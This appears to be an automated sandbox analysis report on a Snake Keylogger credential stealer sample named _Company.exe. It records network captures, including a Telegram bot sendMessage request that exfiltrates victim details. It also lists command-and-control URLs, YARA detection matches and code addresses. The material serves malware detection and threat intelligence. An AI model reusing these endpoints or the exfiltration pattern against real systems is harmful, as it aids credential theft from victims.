Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.6:49724 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20and%20Time:%2019/12/2024%20/%2015:38:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20377142%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: smtp.hostinger.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 18 Dec 2024 16:07:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: _Company.exe, 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: _Company.exe, 00000002.00000002.4647934767.0000000003313000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000332B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.hostinger.com
Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003121000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a
Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: _Company.exe, 00000002.00000002.4647934767.00000000032B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: _Company.exe, 00000002.00000002.4647934767.00000000032B2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000316F000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000031DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.000000000316F000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: _Company.exe, 00000002.00000002.4647934767.0000000003199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: _Company.exe, 00000002.00000002.4647934767.0000000003208000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000031DF000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.0000000003199000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: _Company.exe, 00000002.00000002.4651641418.0000000004141000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4651641418.000000000442D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: _Company.exe, 00000002.00000002.4647934767.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, _Company.exe, 00000002.00000002.4647934767.00000000032D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: _Company.exe, 00000002.00000002.4647934767.00000000032E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49803 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2._Company.exe.5760000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 1.2._Company.exe.5760000.7.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 1.2._Company.exe.3f4ad70.5.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2._Company.exe.4087840.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2._Company.exe.4087840.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2._Company.exe.4043e10.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2._Company.exe.4043e10.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2._Company.exe.3f4ad70.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 1.2._Company.exe.2ef4340.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects downloader injector Author: ditekSHen
Source: 00000002.00000002.4645850927.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: _Company.exe PID: 6080, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: _Company.exe PID: 7100, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_0128D304	1_2_0128D304
Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_053565B0	1_2_053565B0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_0535BF70	1_2_0535BF70
Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_05350006	1_2_05350006
Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_05350040	1_2_05350040
Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_0535AD60	1_2_0535AD60
Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_0535BF60	1_2_0535BF60
Source: C:\Users\user\Desktop\_Company.exe	Code function: 1_2_06179680	1_2_06179680
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_010A7157	2_2_010A7157
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_010A2668	2_2_010A2668
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_010AC0B8	2_2_010AC0B8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_010A5308	2_2_010A5308
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_010A2254	2_2_010A2254
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139C147	2_2_0139C147
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_01395362	2_2_01395362
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139D278	2_2_0139D278
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139D548	2_2_0139D548
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139C475	2_2_0139C475
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139C738	2_2_0139C738
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139F961	2_2_0139F961
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_013969A0	2_2_013969A0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139E988	2_2_0139E988
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139CA08	2_2_0139CA08
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_01399DE0	2_2_01399DE0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139CCD8	2_2_0139CCD8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139CFAC	2_2_0139CFAC
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_01396FC8	2_2_01396FC8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0139E97C	2_2_0139E97C
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_013939F0	2_2_013939F0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_013929EC	2_2_013929EC
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_01393AA1	2_2_01393AA1
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_01393E09	2_2_01393E09
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05569548	2_2_05569548
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05562968	2_2_05562968
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556FC68	2_2_0556FC68
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05569C18	2_2_05569C18
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05565028	2_2_05565028
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05560B30	2_2_05560B30
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_055617A0	2_2_055617A0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05561E80	2_2_05561E80
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556D550	2_2_0556D550
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556295A	2_2_0556295A
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556D540	2_2_0556D540
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556DDFF	2_2_0556DDFF
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556D999	2_2_0556D999
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556D9A8	2_2_0556D9A8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05560040	2_2_05560040
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556F810	2_2_0556F810
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05565018	2_2_05565018
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05560006	2_2_05560006
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556F801	2_2_0556F801
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556D0F8	2_2_0556D0F8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556CC8F	2_2_0556CC8F
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556CCA0	2_2_0556CCA0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556EF51	2_2_0556EF51
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556EF60	2_2_0556EF60
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556EB08	2_2_0556EB08
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05560B20	2_2_05560B20
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05568B91	2_2_05568B91
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556178F	2_2_0556178F
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556F3B8	2_2_0556F3B8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05568BA0	2_2_05568BA0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556F3A8	2_2_0556F3A8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556E258	2_2_0556E258
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556E249	2_2_0556E249
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_05561E70	2_2_05561E70
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556DE00	2_2_0556DE00
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556EAF8	2_2_0556EAF8
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556E6B0	2_2_0556E6B0
Source: C:\Users\user\Desktop\_Company.exe	Code function: 2_2_0556E6AF	2_2_0556E6AF

Source: _Company.exe, 00000001.00000002.4647497521.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs _Company.exe
Source: _Company.exe, 00000001.00000002.4647497521.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs _Company.exe
Source: _Company.exe, 00000001.00000002.4651072247.0000000005760000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs _Company.exe
Source: _Company.exe, 00000001.00000002.4650749475.0000000005610000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAQipUvwTwkLZyiCs.dll: vs _Company.exe
Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameExample.dll0 vs _Company.exe
Source: _Company.exe, 00000001.00000002.4648963586.0000000003ED9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs _Company.exe
Source: _Company.exe, 00000001.00000002.4646190970.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs _Company.exe
Source: _Company.exe, 00000001.00000000.2189576131.0000000000ACA000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePano.exe* vs _Company.exe
Source: _Company.exe, 00000002.00000002.4645850927.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs _Company.exe
Source: _Company.exe, 00000002.00000002.4645988983.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs _Company.exe
Source: _Company.exe	Binary or memory string: OriginalFilenamePano.exe* vs _Company.exe

Source: _Company.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.2._Company.exe.5760000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 1.2._Company.exe.5760000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 1.2._Company.exe.3f4ad70.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2._Company.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
